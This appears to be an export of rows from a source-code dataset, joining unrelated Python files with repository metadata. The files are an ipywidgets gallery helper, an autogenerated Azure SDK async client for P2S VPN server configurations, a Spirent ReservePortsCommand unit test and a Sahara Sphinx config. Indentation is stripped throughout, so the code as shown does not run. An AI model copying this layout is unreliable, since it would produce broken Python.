if 'selection' in module:
extra_args = dict(options=[1, 2, 3])
elif 'progress' in widget.__name__.lower():
extra_args = dict(value=50)
elif 'gridspeclayout' in widget.__name__.lower():
extra_args = dict(n_rows=3, n_columns=3)
else:
extra_args = {}
wid = widget(description='A label!', **extra_args)
try:
short_description = wid.__doc__.split('\n')[0]
if not short_description:
short_description = wid.__doc__.split('\n')[1]
except AttributeError:
short_description = ''
url = f'{help_url_base}#{name}'
if help_url_base == '':
help_link = f'<h3><a href="{url}" rel="nofollow" target="_self" style="color:gray;">{name}</a></h3><p>{short_description}</p>'
else:
magic_stuff = 'data-commandlinker-command="rendermime:handle-local-link" data-commandlinker-args="{"path":"04.00-widget-list.ipynb","id":"#IntRangeSlider"}"'
help_link = f'<h3><a href="{url}" rel="nofollow" target="_blank" style="color:gray;" {magic_stuff}>{name}</a></h3><p>{short_description}</p>'
title = widgets.HTML(value=help_link)
title.layout.padding = '10px'
b.layout.overflow_x = 'hidden'
b.children = [title, wid]
return b
for group, group_widgets in groups.items():
# print(group)
titles.append(group)
col_spec = f"repeat({columns}, minmax({min_width_single_widget}px, 1fr)"
layout = widgets.Layout(grid_template_columns=col_spec,
grid_gap='10px 10px')
kid = widgets.GridBox(layout=layout)
kid.children = [box_maker(k, v, group) for k, v in group_widgets.items()]
kids.append(kid)
tabs.children = kids
for i, title in enumerate(titles):
nice = title.replace('_', ' ')
tabs.set_title(i, nice.title())
return tabs
| [
"[email protected]"
] | |
9969606a2dac6ff81118988c97c9fc5a469e593a | 1a166165ab8287d01cbb377a13efdb5eff5dfef0 | /sdk/network/azure-mgmt-network/azure/mgmt/network/v2018_12_01/aio/operations/_p2_svpn_server_configurations_operations.py | f65a8a822f3417fc8e16dbaf0b1f3ae67ffef1ac | [
"MIT",
"LicenseRef-scancode-generic-cla",
"LGPL-2.1-or-later"
] | permissive | manoj0806/azure-sdk-for-python | 7a14b202ff80f528abd068bf50334e91001a9686 | aab999792db1132232b2f297c76800590a901142 | refs/heads/master | 2023-04-19T16:11:31.984930 | 2021-04-29T23:19:49 | 2021-04-29T23:19:49 | 363,025,016 | 1 | 0 | MIT | 2021-04-30T04:23:35 | 2021-04-30T04:23:35 | null | UTF-8 | Python | false | false | 23,195 | py | # coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is regenerated.
# --------------------------------------------------------------------------
from typing import Any, AsyncIterable, Callable, Dict, Generic, Optional, TypeVar, Union
import warnings
from azure.core.async_paging import AsyncItemPaged, AsyncList
from azure.core.exceptions import ClientAuthenticationError, HttpResponseError, ResourceExistsError, ResourceNotFoundError, map_error
from azure.core.pipeline import PipelineResponse
from azure.core.pipeline.transport import AsyncHttpResponse, HttpRequest
from azure.core.polling import AsyncLROPoller, AsyncNoPolling, AsyncPollingMethod
from azure.mgmt.core.exceptions import ARMErrorFormat
from azure.mgmt.core.polling.async_arm_polling import AsyncARMPolling
from ... import models as _models
T = TypeVar('T')
ClsType = Optional[Callable[[PipelineResponse[HttpRequest, AsyncHttpResponse], T, Dict[str, Any]], Any]]
class P2SVpnServerConfigurationsOperations:
"""P2SVpnServerConfigurationsOperations async operations.
You should not instantiate this class directly. Instead, you should create a Client instance that
instantiates it for you and attaches it as an attribute.
:ivar models: Alias to model classes used in this operation group.
:type models: ~azure.mgmt.network.v2018_12_01.models
:param client: Client for service requests.
:param config: Configuration of service client.
:param serializer: An object model serializer.
:param deserializer: An object model deserializer.
"""
models = _models
def __init__(self, client, config, serializer, deserializer) -> None:
self._client = client
self._serialize = serializer
self._deserialize = deserializer
self._config = config
async def get(
self,
resource_group_name: str,
virtual_wan_name: str,
p2_s_vpn_server_configuration_name: str,
**kwargs
) -> "_models.P2SVpnServerConfiguration":
"""Retrieves the details of a P2SVpnServerConfiguration.
:param resource_group_name: The resource group name of the P2SVpnServerConfiguration.
:type resource_group_name: str
:param virtual_wan_name: The name of the VirtualWan.
:type virtual_wan_name: str
:param p2_s_vpn_server_configuration_name: The name of the P2SVpnServerConfiguration.
:type p2_s_vpn_server_configuration_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: P2SVpnServerConfiguration, or the result of cls(response)
:rtype: ~azure.mgmt.network.v2018_12_01.models.P2SVpnServerConfiguration
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.P2SVpnServerConfiguration"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2018-12-01"
accept = "application/json"
# Construct URL
url = self.get.metadata['url'] # type: ignore
path_format_arguments = {
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'virtualWanName': self._serialize.url("virtual_wan_name", virtual_wan_name, 'str'),
'p2SVpnServerConfigurationName': self._serialize.url("p2_s_vpn_server_configuration_name", p2_s_vpn_server_configuration_name, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
request = self._client.get(url, query_parameters, header_parameters)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize(_models.Error, response)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
deserialized = self._deserialize('P2SVpnServerConfiguration', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
get.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/virtualWans/{virtualWanName}/p2sVpnServerConfigurations/{p2SVpnServerConfigurationName}'} # type: ignore
async def _create_or_update_initial(
self,
resource_group_name: str,
virtual_wan_name: str,
p2_s_vpn_server_configuration_name: str,
p2_s_vpn_server_configuration_parameters: "_models.P2SVpnServerConfiguration",
**kwargs
) -> "_models.P2SVpnServerConfiguration":
cls = kwargs.pop('cls', None) # type: ClsType["_models.P2SVpnServerConfiguration"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2018-12-01"
content_type = kwargs.pop("content_type", "application/json")
accept = "application/json"
# Construct URL
url = self._create_or_update_initial.metadata['url'] # type: ignore
path_format_arguments = {
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'virtualWanName': self._serialize.url("virtual_wan_name", virtual_wan_name, 'str'),
'p2SVpnServerConfigurationName': self._serialize.url("p2_s_vpn_server_configuration_name", p2_s_vpn_server_configuration_name, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Content-Type'] = self._serialize.header("content_type", content_type, 'str')
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
body_content_kwargs = {} # type: Dict[str, Any]
body_content = self._serialize.body(p2_s_vpn_server_configuration_parameters, 'P2SVpnServerConfiguration')
body_content_kwargs['content'] = body_content
request = self._client.put(url, query_parameters, header_parameters, **body_content_kwargs)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200, 201]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize(_models.Error, response)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
if response.status_code == 200:
deserialized = self._deserialize('P2SVpnServerConfiguration', pipeline_response)
if response.status_code == 201:
deserialized = self._deserialize('P2SVpnServerConfiguration', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
_create_or_update_initial.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/virtualWans/{virtualWanName}/p2sVpnServerConfigurations/{p2SVpnServerConfigurationName}'} # type: ignore
async def begin_create_or_update(
self,
resource_group_name: str,
virtual_wan_name: str,
p2_s_vpn_server_configuration_name: str,
p2_s_vpn_server_configuration_parameters: "_models.P2SVpnServerConfiguration",
**kwargs
) -> AsyncLROPoller["_models.P2SVpnServerConfiguration"]:
"""Creates a P2SVpnServerConfiguration to associate with a VirtualWan if it doesn't exist else
updates the existing P2SVpnServerConfiguration.
:param resource_group_name: The resource group name of the VirtualWan.
:type resource_group_name: str
:param virtual_wan_name: The name of the VirtualWan.
:type virtual_wan_name: str
:param p2_s_vpn_server_configuration_name: The name of the P2SVpnServerConfiguration.
:type p2_s_vpn_server_configuration_name: str
:param p2_s_vpn_server_configuration_parameters: Parameters supplied to create or Update a
P2SVpnServerConfiguration.
:type p2_s_vpn_server_configuration_parameters: ~azure.mgmt.network.v2018_12_01.models.P2SVpnServerConfiguration
:keyword callable cls: A custom type or function that will be passed the direct response
:keyword str continuation_token: A continuation token to restart a poller from a saved state.
:keyword polling: True for ARMPolling, False for no polling, or a
polling object for personal polling strategy
:paramtype polling: bool or ~azure.core.polling.AsyncPollingMethod
:keyword int polling_interval: Default waiting time between two polls for LRO operations if no Retry-After header is present.
:return: An instance of AsyncLROPoller that returns either P2SVpnServerConfiguration or the result of cls(response)
:rtype: ~azure.core.polling.AsyncLROPoller[~azure.mgmt.network.v2018_12_01.models.P2SVpnServerConfiguration]
:raises ~azure.core.exceptions.HttpResponseError:
"""
polling = kwargs.pop('polling', True) # type: Union[bool, AsyncPollingMethod]
cls = kwargs.pop('cls', None) # type: ClsType["_models.P2SVpnServerConfiguration"]
lro_delay = kwargs.pop(
'polling_interval',
self._config.polling_interval
)
cont_token = kwargs.pop('continuation_token', None) # type: Optional[str]
if cont_token is None:
raw_result = await self._create_or_update_initial(
resource_group_name=resource_group_name,
virtual_wan_name=virtual_wan_name,
p2_s_vpn_server_configuration_name=p2_s_vpn_server_configuration_name,
p2_s_vpn_server_configuration_parameters=p2_s_vpn_server_configuration_parameters,
cls=lambda x,y,z: x,
**kwargs
)
kwargs.pop('error_map', None)
kwargs.pop('content_type', None)
def get_long_running_output(pipeline_response):
deserialized = self._deserialize('P2SVpnServerConfiguration', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
path_format_arguments = {
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'virtualWanName': self._serialize.url("virtual_wan_name", virtual_wan_name, 'str'),
'p2SVpnServerConfigurationName': self._serialize.url("p2_s_vpn_server_configuration_name", p2_s_vpn_server_configuration_name, 'str'),
}
if polling is True: polling_method = AsyncARMPolling(lro_delay, path_format_arguments=path_format_arguments, **kwargs)
elif polling is False: polling_method = AsyncNoPolling()
else: polling_method = polling
if cont_token:
return AsyncLROPoller.from_continuation_token(
polling_method=polling_method,
continuation_token=cont_token,
client=self._client,
deserialization_callback=get_long_running_output
)
else:
return AsyncLROPoller(self._client, raw_result, get_long_running_output, polling_method)
begin_create_or_update.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/virtualWans/{virtualWanName}/p2sVpnServerConfigurations/{p2SVpnServerConfigurationName}'} # type: ignore
async def _delete_initial(
self,
resource_group_name: str,
virtual_wan_name: str,
p2_s_vpn_server_configuration_name: str,
**kwargs
) -> None:
cls = kwargs.pop('cls', None) # type: ClsType[None]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2018-12-01"
accept = "application/json"
# Construct URL
url = self._delete_initial.metadata['url'] # type: ignore
path_format_arguments = {
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'virtualWanName': self._serialize.url("virtual_wan_name", virtual_wan_name, 'str'),
'p2SVpnServerConfigurationName': self._serialize.url("p2_s_vpn_server_configuration_name", p2_s_vpn_server_configuration_name, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
request = self._client.delete(url, query_parameters, header_parameters)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200, 202, 204]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize(_models.Error, response)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
if cls:
return cls(pipeline_response, None, {})
_delete_initial.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/virtualWans/{virtualWanName}/p2sVpnServerConfigurations/{p2SVpnServerConfigurationName}'} # type: ignore
async def begin_delete(
self,
resource_group_name: str,
virtual_wan_name: str,
p2_s_vpn_server_configuration_name: str,
**kwargs
) -> AsyncLROPoller[None]:
"""Deletes a P2SVpnServerConfiguration.
:param resource_group_name: The resource group name of the P2SVpnServerConfiguration.
:type resource_group_name: str
:param virtual_wan_name: The name of the VirtualWan.
:type virtual_wan_name: str
:param p2_s_vpn_server_configuration_name: The name of the P2SVpnServerConfiguration.
:type p2_s_vpn_server_configuration_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:keyword str continuation_token: A continuation token to restart a poller from a saved state.
:keyword polling: True for ARMPolling, False for no polling, or a
polling object for personal polling strategy
:paramtype polling: bool or ~azure.core.polling.AsyncPollingMethod
:keyword int polling_interval: Default waiting time between two polls for LRO operations if no Retry-After header is present.
:return: An instance of AsyncLROPoller that returns either None or the result of cls(response)
:rtype: ~azure.core.polling.AsyncLROPoller[None]
:raises ~azure.core.exceptions.HttpResponseError:
"""
polling = kwargs.pop('polling', True) # type: Union[bool, AsyncPollingMethod]
cls = kwargs.pop('cls', None) # type: ClsType[None]
lro_delay = kwargs.pop(
'polling_interval',
self._config.polling_interval
)
cont_token = kwargs.pop('continuation_token', None) # type: Optional[str]
if cont_token is None:
raw_result = await self._delete_initial(
resource_group_name=resource_group_name,
virtual_wan_name=virtual_wan_name,
p2_s_vpn_server_configuration_name=p2_s_vpn_server_configuration_name,
cls=lambda x,y,z: x,
**kwargs
)
kwargs.pop('error_map', None)
kwargs.pop('content_type', None)
def get_long_running_output(pipeline_response):
if cls:
return cls(pipeline_response, None, {})
path_format_arguments = {
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'virtualWanName': self._serialize.url("virtual_wan_name", virtual_wan_name, 'str'),
'p2SVpnServerConfigurationName': self._serialize.url("p2_s_vpn_server_configuration_name", p2_s_vpn_server_configuration_name, 'str'),
}
if polling is True: polling_method = AsyncARMPolling(lro_delay, path_format_arguments=path_format_arguments, **kwargs)
elif polling is False: polling_method = AsyncNoPolling()
else: polling_method = polling
if cont_token:
return AsyncLROPoller.from_continuation_token(
polling_method=polling_method,
continuation_token=cont_token,
client=self._client,
deserialization_callback=get_long_running_output
)
else:
return AsyncLROPoller(self._client, raw_result, get_long_running_output, polling_method)
begin_delete.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/virtualWans/{virtualWanName}/p2sVpnServerConfigurations/{p2SVpnServerConfigurationName}'} # type: ignore
def list_by_virtual_wan(
self,
resource_group_name: str,
virtual_wan_name: str,
**kwargs
) -> AsyncIterable["_models.ListP2SVpnServerConfigurationsResult"]:
"""Retrieves all P2SVpnServerConfigurations for a particular VirtualWan.
:param resource_group_name: The resource group name of the VirtualWan.
:type resource_group_name: str
:param virtual_wan_name: The name of the VirtualWan.
:type virtual_wan_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: An iterator like instance of either ListP2SVpnServerConfigurationsResult or the result of cls(response)
:rtype: ~azure.core.async_paging.AsyncItemPaged[~azure.mgmt.network.v2018_12_01.models.ListP2SVpnServerConfigurationsResult]
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.ListP2SVpnServerConfigurationsResult"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2018-12-01"
accept = "application/json"
def prepare_request(next_link=None):
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
if not next_link:
# Construct URL
url = self.list_by_virtual_wan.metadata['url'] # type: ignore
path_format_arguments = {
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'virtualWanName': self._serialize.url("virtual_wan_name", virtual_wan_name, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
request = self._client.get(url, query_parameters, header_parameters)
else:
url = next_link
query_parameters = {} # type: Dict[str, Any]
request = self._client.get(url, query_parameters, header_parameters)
return request
async def extract_data(pipeline_response):
deserialized = self._deserialize('ListP2SVpnServerConfigurationsResult', pipeline_response)
list_of_elem = deserialized.value
if cls:
list_of_elem = cls(list_of_elem)
return deserialized.next_link or None, AsyncList(list_of_elem)
async def get_next(next_link=None):
request = prepare_request(next_link)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
error = self._deserialize(_models.Error, response)
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
return pipeline_response
return AsyncItemPaged(
get_next, extract_data
)
list_by_virtual_wan.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/virtualWans/{virtualWanName}/p2sVpnServerConfigurations'} # type: ignore
| [
"[email protected]"
] | |
d99a029c03dcdfe98683393cb23dc737e077714b | 83316dd8a01070711fe8c42cd38d245da9a4711e | /testmethodology/trafficcenter/stakunittest/test_ReservePortsCommand.py | 7a598086724fe16870f4f35fbce33f81dbe7a643 | [] | no_license | CmWork/STAKCommands | fa46d561d0a85ac49c14f1b1fc6c014d2e0955bc | 8b3fb68912116f7973fa9b3677d4e3d43c92f194 | refs/heads/master | 2020-05-02T00:57:20.940300 | 2015-07-10T04:32:37 | 2015-07-10T04:32:37 | 38,860,960 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 8,946 | py | import copy
import json
import pytest
from mock import MagicMock, patch
from StcIntPythonPL import CStcSystem, CScriptableCreator, RelationType, CHandleRegistry
from spirent.methodology.trafficcenter.ReservePortsCommand import *
import spirent.methodology.trafficcenter.ReservePortsCommand
partial_topology_config = [
{
'name': 'West',
'subnet_configs': [
{
'subnet': {
'name': 'name_1',
'id': '1234'
},
'ports': [{'location': '//10.1.1.1/1/1'}]
},
{
'subnet': {
'name': 'name_2',
'id': '1235'
},
'ports': [{'location': '//10.1.1.2/1/1'}]
},
]
},
{
'name': 'East',
'subnet_configs': [
{
'subnet': {
'name': 'name_3',
'id': '1236'
},
'ports': [{'location': '//10.1.1.3/1/1'}]
},
{
'subnet': {
'name': 'name_4',
'id': '1237'
},
'ports': [{'location': '//10.1.1.4/1/1'}]
},
]
}
]
@pytest.fixture
def clean_up_ports(request, stc):
def cleanup():
project = CStcSystem.Instance().GetObject('project')
ports = project.GetObjects('port')
for port in ports:
port.MarkDelete()
request.addfinalizer(cleanup)
cleanup()
def test_validate():
assert validate(json.dumps(partial_topology_config)) == ''
def test_run(stc, clean_up_ports):
spirent.methodology.trafficcenter.ReservePortsCommand.attach_ports = MagicMock()
apply_mock = MagicMock()
spirent.methodology.trafficcenter.ReservePortsCommand._apply = apply_mock
patcher = patch('spirent.methodology.trafficcenter.ReservePortsCommand.get_sibling_ports',
new=MagicMock(return_value={}))
patcher.start()
assert run(json.dumps(partial_topology_config))
project = CStcSystem.Instance().GetObject('project')
ports = project.GetObjects('port')
assert len(ports) == 4
assert ports[0].Get('location') == '//10.1.1.1/1/1'
assert ports[1].Get('location') == '//10.1.1.2/1/1'
assert ports[2].Get('location') == '//10.1.1.3/1/1'
assert ports[3].Get('location') == '//10.1.1.4/1/1'
assert not apply_mock.called
patcher.stop()
def test_empty_ports(stc, clean_up_ports):
spirent.methodology.trafficcenter.ReservePortsCommand.attach_ports = MagicMock()
config_with_no_ports = copy.deepcopy(partial_topology_config)
config_with_no_ports[1]['subnet_configs'][1]['ports'] = []
with pytest.raises(RuntimeError):
with AutoCommand('spirent.methodology.trafficcenter.ReservePortsCommand') as cmd:
cmd.Set('TopologyConfig', json.dumps(config_with_no_ports))
cmd.Execute()
assert cmd.Get('Status') == 'ports on subnet name_4 is empty'
def simulate_online(port_handles):
ctor = CScriptableCreator()
for handle in port_handles:
port = CHandleRegistry.Instance().Find(handle)
phy = ctor.Create('EthernetCopper', port)
port.AddObject(phy, RelationType('ActivePhy'))
def test_change_speed(stc, clean_up_ports):
attach_ports_mock = MagicMock(side_effect=simulate_online)
spirent.methodology.trafficcenter.ReservePortsCommand.attach_ports = attach_ports_mock
apply_mock = MagicMock()
spirent.methodology.trafficcenter.ReservePortsCommand._apply = apply_mock
patcher = patch('spirent.methodology.trafficcenter.ReservePortsCommand.get_sibling_ports',
new=MagicMock(return_value={}))
patcher.start()
supported_phys_mock = MagicMock(return_value=['ETHERNET_100_GIG_FIBER'])
spirent.methodology.trafficcenter.ReservePortsCommand._get_supported_phys = supported_phys_mock
config_with_speed = copy.deepcopy(partial_topology_config)
config_with_speed[1]['subnet_configs'][1]['ports'][0]['speed'] = '100G'
run(json.dumps(config_with_speed))
project = CStcSystem.Instance().GetObject('project')
ports = project.GetObjects('port')
assert len(ports) == 4
phys = [x.GetType() for x in ports[3].GetObjects('EthernetPhy')]
assert phys[0] == 'ethernetcopper'
assert phys[1] == 'ethernet100gigfiber'
phy = ports[3].GetObject('EthernetPhy', RelationType('ActivePhy'))
assert phy.Get('LineSpeed') == 'SPEED_100G'
assert phy.GetType() == 'ethernet100gigfiber'
assert apply_mock.called
patcher.stop()
def test_no_change_speed_does_not_apply(stc, clean_up_ports):
attach_ports_mock = MagicMock(side_effect=simulate_online)
spirent.methodology.trafficcenter.ReservePortsCommand.attach_ports = attach_ports_mock
apply_mock = MagicMock()
spirent.methodology.trafficcenter.ReservePortsCommand._apply = apply_mock
config_with_speed = copy.deepcopy(partial_topology_config)
config_with_speed[1]['subnet_configs'][1]['ports'][0]['speed'] = '1G'
run(json.dumps(config_with_speed))
assert not apply_mock.called
def simulate_online_with_pos(port_handles):
ctor = CScriptableCreator()
for handle in port_handles:
port = CHandleRegistry.Instance().Find(handle)
phy = ctor.Create('POSPhy', port)
port.AddObject(phy, RelationType('ActivePhy'))
def test_only_support_ethernet(stc, clean_up_ports):
attach_ports_mock = MagicMock(side_effect=simulate_online_with_pos)
spirent.methodology.trafficcenter.ReservePortsCommand.attach_ports = attach_ports_mock
config_with_speed = copy.deepcopy(partial_topology_config)
config_with_speed[1]['subnet_configs'][1]['ports'][0]['speed'] = '100G'
assert not run(json.dumps(config_with_speed))
def setup_physical_test_module(stc_sys):
ctor = CScriptableCreator()
chassis_mgr = ctor.Create('PhysicalChassisManager', stc_sys)
chassis = ctor.Create('PhysicalChassis', chassis_mgr)
test_module = ctor.Create('PhysicalTestModule', chassis)
test_module.Set('PortGroupSiblingCount', 4)
physical_ports = []
for i in range(1, 5):
physical_port_group = ctor.Create('PhysicalPortGroup', test_module)
physical_port_group.Set('Index', i)
physical_port_group.Set('ReservedByUser', False)
physical_port = ctor.Create('PhysicalPort', physical_port_group)
location = "//10.100.1.1/1/%s" % i
physical_port.Set('Location', location)
physical_port_group.AddObject(physical_port, RelationType('ParentChild'))
physical_ports.append(physical_port)
return physical_ports
@pytest.fixture
def clean_up_physical_test_module(request, stc):
def cleanup():
chassis_manager = CStcSystem.Instance().GetObject('PhysicalChassisManager')
chassis_manager.MarkDelete()
request.addfinalizer(cleanup)
cleanup()
clean_up_ports(request, stc)
def test_get_sibling_ports(stc, clean_up_ports):
ctor = CScriptableCreator()
stc_sys = CStcSystem.Instance()
project = stc_sys.GetObject('Project')
physical_ports = setup_physical_test_module(stc_sys)
port = ctor.Create("Port", project)
physical_ports[0].AddObject(port, RelationType('PhysicalLogical'))
physical_port_group = physical_ports[0].GetParent()
physical_port_group.Set('ReservedByUser', True)
port.Set('IsVirtual', False)
ports = [port]
sibling_ports = get_sibling_ports(ports)
assert len(sibling_ports) == 1
assert len(sibling_ports[port]) == 3
i = 2
for sibling_port in sibling_ports[port]:
location = "//10.100.1.1/1/%s" % i
i += 1
assert sibling_port.Get('Location') == location
def test_change_speed_10M_100M(stc, clean_up_ports):
attach_ports_mock = MagicMock(side_effect=simulate_online)
spirent.methodology.trafficcenter.ReservePortsCommand.attach_ports = attach_ports_mock
apply_mock = MagicMock()
spirent.methodology.trafficcenter.ReservePortsCommand._apply = apply_mock
patcher = patch('spirent.methodology.trafficcenter.ReservePortsCommand.get_sibling_ports',
new=MagicMock(return_value={}))
patcher.start()
config_with_speed = copy.deepcopy(partial_topology_config)
config_with_speed[0]['subnet_configs'][0]['ports'][0]['speed'] = '10M'
config_with_speed[0]['subnet_configs'][1]['ports'][0]['speed'] = '100M'
run(json.dumps(config_with_speed))
project = CStcSystem.Instance().GetObject('project')
ports = project.GetObjects('port')
assert len(ports) == 4
phys_list = [x.GetObjects('EthernetPhy') for x in ports[0:2]]
for phys in phys_list:
assert len(phys) == 1
assert phys[0].GetType() == 'ethernetcopper'
assert not phys[0].Get('AutoNegotiation')
assert apply_mock.called
patcher.stop()
def test_reset():
assert reset()
| [
"[email protected]"
] | |
3daeb98cf549c02dfd2bbba036a474e93b402841 | 5a281cb78335e06c631181720546f6876005d4e5 | /sahara-10.0.0/api-ref/source/conf.py | d7580249d82601bc268b6c35106c8df3c1ec2580 | [
"Apache-2.0"
] | permissive | scottwedge/OpenStack-Stein | d25b2a5bb54a714fc23f0ff0c11fb1fdacad85e8 | 7077d1f602031dace92916f14e36b124f474de15 | refs/heads/master | 2021-03-22T16:07:19.561504 | 2020-03-15T01:31:10 | 2020-03-15T01:31:10 | 247,380,811 | 0 | 0 | Apache-2.0 | 2020-03-15T01:24:15 | 2020-03-15T01:24:15 | null | UTF-8 | Python | false | false | 7,091 | py | # -*- coding: utf-8 -*-
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
#
# sahara documentation build configuration file, created Fri May 6 15:19:20
# 2016.
#
# This file is execfile()d with the current directory set to
# its containing dir.
#
# Note that not all possible configuration values are present in this
# autogenerated file.
#
# All configuration values have a default; values that are commented out
# serve to show the default.
import os
import sys
extensions = [
'os_api_ref',
'openstackdocstheme'
]
# openstackdocstheme options
repository_name = 'openstack/sahara'
bug_project = '935'
bug_tag = 'api-ref'
html_last_updated_fmt = '%Y-%m-%d %H:%M'
html_theme = 'openstackdocs'
html_theme_options = {
"sidebar_dropdown": "api_ref",
"sidebar_mode": "toc",
}
# If extensions (or modules to document with autodoc) are in another directory,
# add these directories to sys.path here. If the directory is relative to the
# documentation root, use os.path.abspath to make it absolute, like shown here.
sys.path.insert(0, os.path.abspath('../../'))
sys.path.insert(0, os.path.abspath('../'))
sys.path.insert(0, os.path.abspath('./'))
# -- General configuration ----------------------------------------------------
# Add any Sphinx extension module names here, as strings. They can be
# extensions coming with Sphinx (named 'sphinx.ext.*') or your custom ones.
# The suffix of source filenames.
source_suffix = '.rst'
# The encoding of source files.
#
# source_encoding = 'utf-8'
# The master toctree document.
master_doc = 'index'
# General information about the project.
project = u'Data Processing API Reference'
copyright = u'2010-present, OpenStack Foundation'
# The version info for the project you're documenting, acts as replacement for
# |version| and |release|, also used in various other places throughout the
# built documents.
#
from sahara.version import version_info
# The full version, including alpha/beta/rc tags.
release = version_info.release_string()
# The short X.Y version.
version = version_info.version_string()
# The language for content autogenerated by Sphinx. Refer to documentation
# for a list of supported languages.
#
# language = None
# There are two options for replacing |today|: either, you set today to some
# non-false value, then it is used:
# today = ''
# Else, today_fmt is used as the format for a strftime call.
# today_fmt = '%B %d, %Y'
# The reST default role (used for this markup: `text`) to use
# for all documents.
# default_role = None
# If true, '()' will be appended to :func: etc. cross-reference text.
# add_function_parentheses = True
# If true, the current module name will be prepended to all description
# unit titles (such as .. function::).
add_module_names = False
# If true, sectionauthor and moduleauthor directives will be shown in the
# output. They are ignored by default.
show_authors = False
# The name of the Pygments (syntax highlighting) style to use.
pygments_style = 'sphinx'
# -- Options for man page output ----------------------------------------------
# Grouping the document tree for man pages.
# List of tuples 'sourcefile', 'target', u'title', u'Authors name', 'manual'
